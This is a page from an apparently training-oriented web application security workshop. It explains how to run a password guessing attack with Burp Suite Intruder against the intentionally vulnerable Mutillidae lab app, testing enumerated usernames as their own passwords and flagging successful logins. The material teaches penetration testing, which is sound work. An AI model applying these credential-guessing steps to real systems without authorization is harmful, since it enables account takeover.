infosecgirls
Appsec
Appsec
  • Introduction
  • Application Details
    • VM - Pre-req
    • Import Virtual Machines
    • Access Mutillidae Web Application
  • INITIAL SETUP WITH OWASP ZAP
    • OWASP ZAP
    • Setup OWASP ZAP
    • Modes
    • Automated Scan
    • Report Generation
  • Initial Setup with Burp
    • Start Burp Suite
    • Add FoxyProxy Addon
    • Add New Proxy In FoxyProxy
    • Configure Proxy Listener
    • Install Burp's CA Certificate In Firefox
    • Getting Rid of Unnecessary Browser Traffic
  • Quick Basics
    • Disable Intercept Mode in Burp
    • Enable Intercept Mode in Burp
    • Send to Repeater
    • Send to Comparer
  • Web Application Pentesting
    • A1 - Injection
      • SQL Injection with bWAPP
      • SQL Injection in DVNA
      • Command Injection in DVNA
    • A2 - Broken Authentication
      • Broken Authentication with bWAPP
    • A3 - Sensitive Data Exposure
      • Sensitive Data Exposure - DVNA
    • A4 - XML External Entities (XXE)
      • XML External Entity (XXE) Injection - Mutillidae
      • XML External Entity (XXE) Injection - DVNA
    • A5 - Broken Access Control
      • Broken Access Control - DVNA
    • A6 - Security Misconfiguration
      • Security Misconfiguration in DVNA
      • Security Misconfiguration in Mutillidae
      • Security Misconfiguration in Security Shepherd
    • A7 - Cross-Site Scripting (XSS)
      • Reflected XSS
      • DOM XSS
      • Stored XSS - Mutillidae
      • XSS - Sending data to remote server
    • A8 - Insecure Deserialization
      • Insecure Deserialization - DVNA
    • A9 - Using Components with Known Vulnerabilities
      • Using Components with Known Vulnerabilities - DVNA
    • 10 - Insufficient Logging & Monitoring
    • References
    • About Us
  • Additional Content
    • Insecure Direct Object Reference
    • Security Misconfiguration
    • Password Guessing Attack
    • User Enumeration
      • Unauthenticated User Access
      • Create a New User
      • Authenticated User Access
      • Intruder: Set Positions
      • Intruder: Define Payload
      • Intruder: Configure Grep - Extract
      • Trigger Attack & Save Results
    • Custom Iterator
    • Null Payload
    • Request in Browser: Privilege Escalation Check
  • Burp Extenders
    • Target
    • Proxy
    • Intruder
    • Repeater
    • Sequencer
    • Decoder
    • Comparer
    • Extender
Powered by GitBook
On this page

Was this helpful?

  1. Additional Content

Password Guessing Attack

PreviousSecurity MisconfigurationNextUser Enumeration

Last updated 4 years ago

Was this helpful?

Scenario: Check if a user account exists for which password is same as the username.

  1. In Mutillidae, go to the login page by clicking on "Login/Register" link.

  • Ensure Burp is in intercept mode.

  • Login to the Mutillidae application.

  • Intercept the login request and, assuming that usernames have already been enumerated, send the request to Intruder.

Mark the payload positions and choose an appropriate attack type (Pitchfork in this case).

Choose payload type as 'Simple list' for the username input field, and load enumerated username list.

To test the scenario where username and password are same, select Copy other payload option and set the value for 'Copy from position' payload option as 1, for password input field.

Note: To perform the test against a separate list of passwords, select payload type as 'Simple list' and load the desired password list.

Go to Intruder > Options > Grep - Extract and identify the position to extract usernames returned by the server. If a user is successfully logged-in, then username passed in the request would match the username returned in the server's response, otherwise the two usernames would not match (as per the current system's behavior).

Go to Intruder > Options > Grep - Match and enter a unique text, say 'Logged In User' that identifies server response for a valid login scenario.

Check the status of the column as set in step #6 (above).

5. Save attack results and extract the valid username/password combinations.